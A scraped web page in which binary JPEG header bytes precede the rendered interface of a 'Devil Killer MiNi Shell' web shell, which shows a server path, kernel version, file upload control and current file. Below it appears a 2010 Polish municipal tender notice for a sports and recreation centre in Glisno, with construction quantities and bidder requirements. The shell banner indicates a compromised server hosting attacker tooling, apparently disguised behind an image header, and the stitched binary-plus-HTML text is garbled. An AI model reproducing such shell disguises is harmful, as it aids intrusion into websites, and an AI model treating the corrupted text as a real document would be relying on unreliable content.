JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100430/105737-N-2010.html

<p class="kh_header"><b>Lubniewice: Budowa wiejskiego centrum sportowo-rekreacyjno-edukacyjnego w Gliśnie</b><br>
<b>Numer ogłoszenia: 105737 - 2010; data zamieszczenia: 30.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubniewice , ul. Jana Pawła II 51, 69-210 Lubniewice, woj. lubuskie, tel. 095 755 70 52, faks 095 755 75 99.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubniewice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa wiejskiego centrum sportowo-rekreacyjno-edukacyjnego w Gliśnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DROGI I CHODNIKI
PROJEKTOWANE ROZWIAZANIA KONSTRUKCJI NAWIERZCHNI DROGOWYCH
Projektuje się budowę dróg wewnętrznych wraz z budową miejsc parkingowych poprzez wykonanie następującego zakresu robót:
-mechaniczne wykonanie koryta na głębokości 20 cm - 827 m2,
-podsypka piaskowa grubości  - 827 m2,
-podbudowa betonowa grubości 15 cm z betonu B 20 - 827 m2,
-krawężniki betonowe wystające 15 x 30 cm - 30 m,
-rowki pod krawężniki - 30 m,
-ława pod krawężnik - 30 m,
-nawierzchnia z kostki betonowej grubości 8 cm - 827 m2,
-układanie nawierzchni gruntowej - ścieżki wokół boiska przy skarpie utwardzonej żwirem grubości 2 cm - 594 m2.
Krawężnik układać na ławie betonowej z oporem. Wysokość krawężnika ponad poziom krawędzi jezdni 12 cm. Na zjazdach oraz na przejściach dla pieszych i rowerów poziom krawężnika przy jezdni należy obniżyć do wysokości h = 2 cm.
Pochylenie poprzeczne jezdni i miejsc postojowych od 0,5% do 1% w kierunkach wskazanych na rysunkach.. Na wjeździe oraz  przy zjazdach z miejsc postojowych projektuje się ułożenie krawężników żelbetowych, najazdowych, na płasko na ławie betonowej 40 x 30 cm wykonanej z betonu B15. Krawężniki ułożyć na ławie betonowej wykonanej z betonu B 15 grubości 30 cm.

PROJEKTOWANE ROZWIAZANIA KONSTRUKCJI NAWIERZCHNI CHODNIKÓW
Projektuje się wykonanie na terenie posesji chodników dla pieszych wykonanych z kostki betonowej typu POLBRUK BECHATON gr. 8 cm,  ułożonej na podsypce piaskowo-cementowej. Grubość podsypki - 10 cm. Projektuje się wykonanie obustronnego obłożenia chodników obrzeżami betonowymi o wymiarach 70 x 15 x 7 cm ułożonych na podsypce piaskowej gr. 5 cm. Chodnik po ułożeniu i okrawężnikowania należy dokładnie zawibrować wibratorami powierzchniowymi.

ODWODNIENIE 
Odprowadzenie wód opadowych przewidziano do istniejących studzienek z kratką wodościekową. Dodatkowo projektuje się pozostawienie przerw pomiędzy krawężnikami co 5 mb  o szerokości 2 cm, wspomagające odprowadzenie wód opadowych na istniejące tereny zielone przy drogach. UWAGA : 
Nie przewiduje się spoinowania krawężników. 

ROBOTY ZIEMNE
Roboty ziemne przy robotach drogowych należy wykonać zgodnie z normą PN-S-02205. Krawężniki istniejące należy rozebrać i zgruzować, po czym przeznaczy do uzupełnienia ubytków w nawierzchni żużlowej.
Zakres robót:
-mechaniczne karczowanie drzew z cięciem pni piłą - 5 szt.,
-mechaniczne karczowanie pni - 5 szt.,
-usunięcie warstwy ziemi urodzajnej o grubości 15 cm za pomocą spycharek - 2112 m2,
-usunięcie warstwy ziemi urodzajnej za pomocą spycharek dodatek za każde 5 cm, razem 15 cm - 2112 m2,
-roboty ziemne wykonane koparkami - plantowanie terenu i wykonanie skarp z transportem do 1 km - 4782 m3,
-plantowanie skarp i nasypów - 420 m2,
-formowanie nasypów o wysokości do 3,0 m spycharkami - 920 m3.

PLAC ZABAW DLA DZIECI   Z BOISKIEM WIELOFUNKCYJNYM 
OPIS ZAŁOŻEŃ FUNKCJONALNYCH
Projekt obejmuje wykonanie zaplecza rekreacyjno-wypoczynkowego na terenie boiska szkolnego po byłej szkole podstawowej w Gliśnie, w skład którego wchodzić będzie:
-boisko do piłki ręcznej (o wymiarach 44 m x 22 m) przystosowane do gry w  piłkę siatkową (o wymiarach 9 m x 18 m) o powierzchni płyty boiska 968,0 m2, o nawierzchni z tworzywa sztucznego
-plac do gry w tenisa stołowego o pow. 141,12 m2 o nawierzchni z kostki betonowej,
-bieżnię o nawierzchni tartanowej - typu CONIPUR, o długości 30,0 mb i szerokości 3,50 mb, 
-plac zabaw dla dzieci z obiektami małej architektury takimi jak: zjeżdżalnie, mini karuzela, huśtawki bujane oraz  piaskownica. Powierzchnia placu zabaw 225 m2, o nawierzchni trawiastej, 
-plac utwardzony przeznaczony do rekreacji dla osób dorosłych z miejscem na grillo-kominek prefabrykowany, ognisko oraz ławeczkami parkowymi, o powierzchni 295,38 m2  utwardzony polbrukiem, z pergolą nad stanowiskiem grilla. 
-ławki przy boisku wkomponowana w projektowane skarpy ziemne, powstałe w wyniku niwelacji terenu pod boisko, o nawierzchni trawiastej z ławkami dla ok. 50 widzów.

OPIS ROZWIAZAŃ TECHNICZNYCH
BOISKO DO GRY W PIŁKĘ RĘCZNĄ
Zakres robót obejmuje:
-mechaniczne wykonanie koryta głębokości 20 cm - 1300 m2,
-podsypka piaskowa grubości 3 cm - 1300 m2,
-podbudowa betonowa grubości 12 cm z betonu B 20 - 1300 m2,
-krawężniki betonowe wystające 15 x 30 cm - 132 m,
-rowki pod krawężniki - 132 m,
-ława pod krawężnik - 9,9 m3,
-nawierzchnia poliuretanowa koloru czerwono-czarnego typu CONIPUR SP (warstwa ścieralna) grubości 13 mm z podkładem ET (mieszanina kruszywa kwarcowego i granulatu gumowego) grubości 35 mm na gotowym podłożu - 968 m2,
-obrzeża betonowe o wymiarach 30 x 8 cm - 96 m,
-nawierzchnia z kostki betonowej grubości 8 cm - 168 m2,
-ławki parkowe murowane z kamienia łamanego - 20 szt. - 10 m3.

ROBOTY ZIEMNE
Projektuje się niwelację istniejącego terenu poprzez usuniecie istniejącego wzniesienia w miejscu projektowanego boiska. Projektuje się usuniecie nadmiaru istniejącego gruntu do rzędnej 99,00 m n.p.m. Większość urobku zostanie zagospodarowana poza terenem działki objętej projektem zagospodarowania, do likwidacji ubytkach w gminnych drogach gruntowych, nieulepszonych. Od strony północnej i zachodniej projektuje się wykonanie skarp o nachyleniu 1:2 które zostaną zagospodarowane jako widownia przy boisku sportowym.

PODBUDOWA BOISKA, NAWIERZCHNIA
Projektuje się wykonanie podsypki na terenie projektowanego boiska. Podsypkę o grubości 3 cm należy wykonać z pospółki zagęszczonej, stanowiącej warstwę odsączającą pod projektowana płytę betonową, stanowiącą warstwę nośną projektowanej płyty boiska. Płytę betonową z betonu B 20 i grubości 12 cm należy ułożyć na podbudowie z  pospółki, po ułożeniu oporów na zewnętrznych krawędziach boiska. Opory wykonać z krawężnika drogowego o wymiarach 100 x 30 x 15, ułożonego na ławie betonowej gr. 10 cm z betonu B 10. W celu zapewnienia właściwego odprowadzenia wód opadowych z terenu boiska, płytę betonowa należy wykonać z lekkim spadkiem na zewnątrz boiska. Projektowany spadek płyty boiska 0,5% od podłużnej osi boiska w kierunku zewnętrznym. 
W podbudowie osadzić tuleje do montażu słupków do gry w siatkówkę i piłkę ręczną.
Na płycie betonowej należy ułożyć nawierzchnię poliuretanową - typu CONIPUR gr. 48 mm. Wymiary boiska 44 m x 28 m, w tym powierzchnia płyty do gry w piłkę ręczną  -  44 m x 22 m.

OTOCZENIE BOISKA
Wokół boiska projektuje się wykonanie ścieżki o nawierzchni trawiastej, wzmocnionej ażurowymi płytami chodnikowymi typu EKOBECHATON o gr. 6 cm. Ścieżkę stanowiącą jednocześnie strefę bezpieczeństwa dla graczy projektuje się o szerokości 2,5 m. 
Za bramkami zamontować piłkochwyty z siatki polipropylenowej, wielkość oczka 8 x 8 cm, grubości 5 mm, zamocowane na słupkach stalowych o średnicy 80 mm, osadzonych w gruncie za pomocą stóp betonowych. Głębokość osadzenia stóp - 80 cm.  Rozstaw słupów co 250 cm.
Wymiary piłkochwytów    H x s = 4,0 m x 28,0 m - 3 szt. 

WYPOSAŻENIE BOISKA
-bramki do gry w piłkę ręczną 2 szt., pełnowymiarowe (2 metry wysokości i 3 metry szerokości), z siatką stylonowa. Bramki o konstrukcji stalowej z rur o średnicy 50 mm, 
-zestaw słupków i siatka do gry w piłkę siatkowa, z tulejami mocującymi i zestawem do naciągania siatki,
-malowanie linii boiska.

PLAC ZABAW DLA DZIECI 
Szczegółowy zakres robót dla placu zabaw dla dzieci:
-mechaniczne wykonanie koryta głębokości 20 cm - 810 m2,
-podsypka piaskowa grubości - 3 cm - 810 m2,
-podbudowa betonowa grubości 12 cm z betonu B 20 - 810 m2,
-nawierzchnia poliuretanowa typu CONIPUR SP grubości 13 mm z podkładem ET grubości 35 mm na gotowym podłożu (bieżnia) - 105 m2,
-obrzeża betonowe o wymiarach 30 x 8 cm - 236 m,
-chodniki z kostki brukowej betonowej grubości 6 cm (plac gry w tenisa stołowego) - 141,12 m2,
-piaskownica, ściany prostokątne z betonu - 5 m3,
-nawierzchnia gruntowa placu zabaw grubości 5 cm - 237,52 m2.

PLAC DO GRY W TENISA STOŁOWEGO
Projektuje się wykonanie placu utwardzonego kostka betonowa typu POLBRUK BECHATON , o grubości 6 cm ułożonej na podsypce piaskowo-cementowej gr. 10 cm. Powierzchnia placu 141,12 m2. Zewnętrzne krawędzie projektowanego placu obłożyć obrzeżami betonowymi o wymiarach 70 x 15 x 7 cm. Na  projektowany placu zostaną zamontowane dwa stoły do gry w tenisa stołowego. Stoły typowe o blatach z płyt żelbetowych - dostawa od producenta posiadającego niezbędne  atesty i certyfikaty. Wymiary - normatywne wymiary stołu do tenisa stołowego.

PLAC ZABAW DLA DZIECI MAŁYCH 3-12 LAT
Projektuje się wykonanie placu zabaw o nawierzchni trawiastej, z naturalnej murawy o pow. 237,52 m2. W celu właściwego przygotowania podłoża projektuje się wykonanie wymiany istniejącego gruntu w miejscu projektowanego placu do głębokości 30 cm. Po usunięciu istniejącego gruntu, w większości nasypowego, należy ułożyć warstwę ziemi urodzajnej o gr. 30 cm. Jakość ułożonej gleby urodzajnej powinna odpowiadać gruntom zaliczanym do III bonitacji gleby. Po ułożeniu warstwy ziemi urodzajnej należy ją zagęścić przy użyciu wibratorów powierzchniowych. Na tak przygotowane podłoże projektuje się ułożenie murawy naturalnej o grubości 6 cm.
Po założeniu murawy na terenie placu zabaw projektuje się ustawienie obiektów małej architektury takich jak:
-huśtawka wagowa podwójna - grupa wiekowa 3-12 lat, konstrukcja stalowa z rur o średnicy 130 mm, podstawa zakotwiona w gruncie przez zabetonowanie, ramiona na tulejach łożyskujących, siedziska z laminatu poliestrowego. Długość huśtawki 300 cm, wysokość zamontowanego urządzenia od 95 do 105 cm,
-huśtawka 2-osobowa (2 szt.) - grupa wiekowa 3-12 lat, konstrukcja stalowa z rur o średnicy 90 mm, zakotwiona w gruncie przez zabetonowanie, zawiesie łożyskowane ze stali nierdzewnej, siedziska atestowane gumowe, wymiary huśtawki - 240 cm x 440 cm, wysokość zamontowanego urządzenia  - od 235 cm do 245 cm,
-karuzelą (o napędzie ręcznym) krzesełkowa 3 osobowa - grupa wiekowa 3-12 lat, konstrukcja stalowa z rur o średnicy 130 mm, malowana piaskowo, zakotwiona w stopie betonowej na głębokości 80 cm, wysokość zamontowanego urządzenia 95-105 cm średnica karuzeli 150 cm. 
-zjeżdżalnię - zestaw zabawowy - grupa wiekowa 3-14 lat , konstrukcja wykonana z drewna toczonego  o  średnicy 100 mm posadowiona  na stopach stalowych ocynkowanych zakotwionych w gruncie przez zabetonowanie. W skład urządzenia wchodzi: wieża kwadratowa z daszkiem ze sklejki laminowanej wodoodpornej, zjeżdżalnia, ścianka linowa, (koci grzbiet), drabinka skośna  wejściowa, wysokość zamontowanego urządzenia - 375 cm do 385 cm , szerokość 565 do 575 cm, długość 545 cm do 560 cm, 
-piaskownicę - przeznaczoną dla grupy wiekowej 1-5 lat.  Piaskownica o konstrukcji ścian wykonanych z betonu B 15 w ilości 5,0  m3, grubość ścianek -  20 cm, głębokość posadowienia 80 cm poniżej projektowanego terenu. Na ściance osadzić siedzisko z drewna  sosnowego impregnowanego. Grubość siedziska 38 mm,   wymiary piaskownicy 310 x 310 cm, wysokość zamontowanego urządzenia  ponad teren  30 cm, 
-ławki parkowe z oparciem 2 szt. ze stelażem stalowym ocynkowanym, malowanym proszkowo, siedzisko i oparcie z desek impregnowanych o wymiarach 1800 x 100 x 40 mm, siedzisko na wysokości 40 cm, podstawa kotwiona w gruncie przy pomocy betonu.
Projektowany plac zabaw zostanie oddzielony od utwardzonych placów przeznaczonych na miejsca postojowe dla samochodów pasem zieleni zimozielonej, średniowysokiej.

UWAGA :
Wszystkie elementy małej architektury montowane na projektowanym placu zabaw muszą posiadać atesty  bezpieczeństwa wydane przez Państwowy Zakład Higieny, dopuszczające je do stosowania na placach zabaw użytkowanych przez dzieci.

BIEŻNIA 
- Projektuje się wykonanie podsypki na terenie projektowanej bieżni . Podsypkę o grubości 3 cm należy wykonać z pospółki zagęszczonej, stanowiącej warstwę odsączającą pod projektowana płytę betonową, stanowiącą warstwę nośną projektowanej bieżni .. Płytę betonową z Betonu B 20 i grubości 12 cm należy ułożyć na podbudowie z  pospółki, po ułożeniu oporów na zewnętrznych krawędziach boiska. Opory wykonać z krawężnika drogowego o wymiarach 100 x 30 x 15, ułożonego na ławie betonowej gr. 10 cm z betonu B 10. W celu zapewnienia właściwego odprowadzenia wód opadowych z terenu boiska, płytę betonowa należy wykonać z lekkim spadkiem na zewnątrz bieżni . Projektowany spadek płyty boiska 0,5% od podłużnej osi boiska w kierunku zewnętrznym. 
Na płycie betonowej należy ułożyć sztuczną murawę tartanową -  typu CONIPUR gr. 40 mm. Powierzchnia bieżni 105 mkw..

PLAC REKREACYJNY DLA OSÓB DOROSŁYCH
ROBOTY ZIEMNE 
Projektuje się niwelację terenu przeznaczonego pod plac wraz z usunięciem gruntu istniejącego, do głębokości  30 cm. Po usunięciu gruntu należy teren wyrównać i wykonać warstwę odsączającą z pospółki zagęszczonej o grubości 3  cm, na  podbudowie z pospółki należy ułożyć warstwę  podbudowy betonowej gr. 12 cm z betonu B 10, a następnie ułożyć kostkę betonową typu BECHATON gr. 6 cm na podsypce z piasku z cementem. Wokół placu należy ułożyć obrzeża trawnikowe, betonowe o wymiarach 70 x 25 x 7 cm.

ROBOTY BUDOWLANE
Projektuje się ustawienie na terenie projektowanego placu ławek i stolików wykonanych z drewna grubego oraz wykonanie kręgu kamiennego pod ognisku o średnicy 250 cm, obłożonego kamieniem polnym.
Na terenie placu projektuje się ustawienie prefabrykowanego, betonowego, ozdobnego grillo-kominka nad którym zostanie wykonana pergola drewniana.
Konstrukcja pergoli - krawędziaki  drewniane o przekroju 12 x 12 cm, dach o nachyleniu 30% odeskowany deskami sosnowymi impregnowanymi gr. 25 mm i pokryty gontem drewnianym. Pergola wykonana na rzucie ośmioboku regularnego wpisanego w okrąg o średnicy 400 cm. Słupy podpierające konstrukcję dachowa zakotwić w gruncie za pomocą stóp betonowych o głębokości 80 cm. 
Wyposażenie  - stolikoławki ogrodowe  12 szt. wykonane z drewna grubego gr. 40 mm, z oparciem. Wysokość siedziska 40 cm, wysokość oparcia 95 cm. Wymiary zestawu  l x s x h= 180 x 80 x 75 cm. Nie projektuje sie kotwienia ławek.  

WIDOWNIA 
Projektuje się wykonanie przy projektowanym boisku miejsc siedzących dla widzów  na około 50 osób. Projektowana widownia zostanie zlokalizowana na skarpie od strony północnej . Widownia obejmować będzie montaż 20 ławek o siedziskach drewnianych i podporach kamiennych murowanych  wkopanych w ziemię. Teren pod ławkami zostanie utwardzony kostką betonowa typu BECHATON (jak chodniki), siedzisko z desek impregnowanych o wymiarach 1800 x 100 x 40 mm, siedzisko na wysokości 40 cm,  Konstrukcja ławek - mur z kamienia łamanego , gr. ścianek 25 cm,. Ściany osadzone w gruncie na głębokości 50 cm..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających: Zamawiający przewiduje udzielenie zamówień uzupełniających do 25% wartości zamówienia podstawowego, opisanego w specyfikacji, zgodnie z art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.20-4, 45.10.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości 20.000,00 zł (słownie: dwadzieścia tysięcy złotych) przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie roboty budowlane odpowiadających swoim rodzajem i wartościom robotom budowlanym stanowiących przedmiot zamówienia, z podaniem ich wartości (kwota minimum 250.000 złotych brutto) oraz daty i miejsca wykonania. Wykazane roboty budowlane muszą być poparte dokumentami (np. referencje) potwierdzającymi, że roboty te zostały wykonane należycie - załącznik nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz niezbędnych do wykonania zamówienia narzędzi, urządzeń i maszyn, którymi dysponuje wykonawca. Wymagane jest dysponowanie co najmniej: 20 narzędzi, urządzeń i maszyn - załącznik nr 9 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia,           a także zakresu wykonywania przez nie czynności. Wymagane jest wykazanie co najmniej 2 specjalistów, którzy posiadają uprawnienia budowlane do kierowania robotami budowlanymi o specjalności konstrukcyjno-budowlanej - załącznik nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
-opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na kwotę nie mniejszą niż 20.000,00 zł (słownie: dwadzieścia tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
